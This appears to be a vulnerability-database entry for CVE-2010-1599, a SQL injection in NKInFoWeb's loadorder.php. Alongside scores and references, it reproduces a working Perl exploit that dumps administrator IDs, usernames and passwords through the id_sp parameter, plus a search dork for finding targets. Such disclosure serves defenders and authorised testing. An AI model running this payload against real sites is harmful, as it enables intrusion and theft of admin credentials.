CVE-2010-1599
high
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
8.5
Description
SQL injection vulnerability in loadorder.php in NKInFoWeb 2.5 and 5.2.2.0 allows remote attackers to execute arbitrary SQL commands via the id_sp parameter.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
NKINFOWEB - SQL Injection
# Software Link: http://jaist.dl.sourceforge.net/project/nkinfoweb/FunctionNkinfoweb_v.species.rar
# Tested on: several linux versions
#=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
#!/usr/bin/perl
use strict;
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# NKINFOWEB SQL INJECTION EXPLOIT #\n";
print "# Author: d4rk-h4ck3r (Tunisian Security Team) #\n";
print "# Greetz to Passeword & Maxilog & all vbspiders members #\n";
print "# Dork: Powered by NKINFOWEB VSp ยฉ 2009 #\n";
print "##############################################################\n";
my $domain = shift @ARGV or banner();
my $injsql ="/loadorder.php?id_sp=-17+union+select+1,2,3,concat(0x3a3a3a,id_usersys,0x3a,usersys,0x3a,pwdsys,0x3a3a3a),5,6,7,8,9,10,11+from+usersys--";
if(get($domain.$injsql) =~ /:::(.+):(.+):(.+):::/)
{
print "\n[+] Exploit Succesfull!";
print "\n[+] Admin id: : $1";
print "\n[+] Admin username: $2";
print "\n[+] Admin password: $3";
print "\n[+] Admin panel: $domain/administrator/ ";}
else
{
print "[!] Exploit Failed!\n";
print "[!] Site Not Vulnerable!\n";
}
sub banner
{
print "[+] NKINFOWEB <= Remote SQL Injection Exploit\n";
print "[+] Usage: ${0} http://[host]\n";
return exit;
}
References
- http://packetstormsecurity.org/1004-exploits/nkinfoweb-sql.txt
- http://secunia.com/advisories/39609
- http://www.exploit-db.com/exploits/12354
- https://exchange.xforce.ibmcloud.com/vulnerabilities/58082
- http://packetstormsecurity.org/1004-exploits/nkinfoweb-sql.txt
- http://secunia.com/advisories/39609
- http://www.exploit-db.com/exploits/12354
- https://exchange.xforce.ibmcloud.com/vulnerabilities/58082
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.